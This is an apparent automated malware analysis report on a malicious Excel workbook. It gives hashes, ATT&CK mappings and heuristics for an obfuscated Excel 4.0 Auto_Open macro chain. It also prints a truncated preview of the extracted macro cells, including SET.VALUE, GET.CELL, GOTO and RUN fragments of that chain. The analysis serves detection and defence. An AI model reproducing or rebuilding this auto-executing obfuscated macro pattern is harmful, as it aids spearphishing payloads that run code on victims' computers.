Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7d66020aacc74034…

MALICIOUS

Office (OLE)

Size: 230.0 KB
Created: 2020-05-15 06:56:24
Authoring application: Microsoft Excel
First seen: 2020-09-07
MD5: e4d5835bcd5f8486e0a9e953a1d3b7eb
SHA-1: 81534290d8925e44c94d75b78bad83ed44a2727c
SHA-256: 7d66020aacc740343595ac42110dce55fed377f7c9a3c21de310b8ef206b02df
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file contains Excel 4.0 macros, specifically an obfuscated Auto_Open execution chain. The `RUN(EC24422)` command within the macro suggests it is designed to execute arbitrary code, likely downloading and running a second-stage payload. The presence of an Auto_Open macro indicates it was likely delivered as a spearphishing attachment.

Heuristics (3)

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 127549 bytes
SHA-256: e2e0e2d9400a3b7c3f2f4f7f99f73232325b94ccfcfff8f049f74d461096af6c

Preview of the extracted script (first 1,000 lines):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!K44061 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,IG27,"",-1.90825688073394506006
'  Sheet,BD56,"",0.09090909090909091161
'  Sheet,HS71,"",-107.00000000000000000000
'  Sheet,JK83,"SET.VALUE(ES51267,151-GET.CELL(17,EB43877))",""
'  Sheet,JK84,RUN(EC24422),""
'  Sheet,GM151,"",-85.00000000000000000000
'  Sheet,IJ167,"",-0.44711538461538463674
'  Sheet,B205,"",-230.00000000000000000000
'  Sheet,JI233,"",6.00000000000000000000
'  Sheet,C234,"",-1.95652173913043481157
'  Sheet,HI272,"",-408.00000000000000000000
'  Sheet,DX304,"",247.00000000000000000000
'  Sheet,JT305,"",3.60784313725490202174
'  Sheet,GN373,"",0.37358590566037730429
'  Sheet,GW379,"",5.05102040816326525174
'  Sheet,HF493,"",323.00000000000000000000
'  Sheet,HC511,"",2.63529411764705878696
'  Sheet,ER548,"",410.00000000000000000000
'  Sheet,JE552,"",0.16363636363636363535
'  Sheet,J555,"",-0.25672371638141811001
'  Sheet,CO583,"",200.00000000000000000000
'  Sheet,BN660,"",-0.21311475409836064254
'  Sheet,FE742,"SET.VALUE(BB8632,GET.CELL(50,EB16762)+-287.00000000000000000000-4)",""
'  Sheet,FE743,GOTO(CA55734),""
'  Sheet,DE828,"",-286.00000000000000000000
'  Sheet,DL844,"",-0.93181818181818176772
'  Sheet,GY864,"",-1.70731707317073166941
'  Sheet,BW872,"",-20.40000000000000568434
'  Sheet,BN877,"",0.58695652173913048788
'  Sheet,EH978,"",132.00000000000000000000
'  Sheet,DM992,"",86.00000000000000000000
'  Sheet,HL1111,"",1.68807339449541293774
'  Sheet,DE1128,"",266.00000000000000000000
'  Sheet,HV1170,"",-329.25000000000000000000
'  Sheet,EA1242,"",-125.00000000000000000000
'  Sheet,JH1259,"",2.02197802197802189994
'  Sheet,DV1265,"",-5.59999999999999431566
'  Sheet,FF1295,"",18.75000000000000000000
'  Sheet,FX1346,"",-200.00000000000000000000
'  Sheet,DM1365,"",-2.71929824561403510330
'  Sheet,IB1393,"",-8.18000488281250071054
'  Sheet,IJ1427,"",-183.00000000000000000000
'  Sheet,JE1436,"",0.42391304347826086474
'  Sheet,BJ1457,"SET.VALUE(FC34223,-148.00000000000000000000-GET.CELL(17,HK32871))",""
'  Sheet,BJ1458,RUN(H40614),""
'  Sheet,CN1528,"",-259.00000000000000000000
'  Sheet,DN1533,"",-1.96202531645569622221
'  Sheet,BV1536,"",-212.00000000000000000000
'  Sheet,FR1565,"",-225.00000000000000000000
'  Sheet,J1654,"",42.20003906249999658939
'  Sheet,CK1709,"",77.00000000000000000000
'  Sheet,HZ1824,"",-401.00000000000000000000
'  Sheet,JI1971,"",2.33599999999999985434
'  Sheet,GK2024,"",93.00000000000000000000
'  Sheet,IY2117,"",-101.00000000000000000000
'  Sheet,BP2134,"",11.00000000000000000000
'  Sheet,IY2144,"",-0.38620689655172413257
'  Sheet,FH2189,"",2.59016293442622957954
'  Sheet,EX2254,"",-4.50000000000000000000
'  Sheet,FB2358,"",75.00000000000000000000
'  Sheet,BM2359,"",3.40000000000000568434
'  Sheet,M2391,"",258.00000000000000000000
'  Sheet,CG2393,"",454.00000000000000000000
'  Sheet,FY2446,"",-510.00000000000000000000
'  Sheet,DE2473,"",2.22619047619047627506
'  Sheet,BR2564,"",280.00000000000000000000
'  Sheet,EY2567,"",7.38805970149253710133
'  Sheet,BV2573,"",2.59154929577464798740
'  Sheet,ID2595,"",-0.08312958435207823404
'  Sheet,JK2614,"",1.23883928571428580945
'  Sheet,HW2627,"",4.48780387804878078128
'  Sheet,GC2674,"",-93.00000000000000000000
'  Sheet,GY2715,"",-70.75000000000000000000
'  Sheet,M2794,"",-87.20007812500000454747
'  Sheet,HZ2872,"",0.61956521739130432369
'  Sheet,BI2879,"",-182.00000000000000000000
'  Sheet,JM2905,"",186.00000000000000000000
'  Sheet,JS2938,"",0.34545454545454545858
'  Sheet,GH2966,"",-0.20537897310513447691
'  Sheet,HO2995,"",0.22962962962962962798
'  Sheet,CZ3025,"",90.20007812500000454747
'  Sheet,EC3050,"",114.00000000000000000000
'  Sheet,HJ3068,"",-0
... (truncated)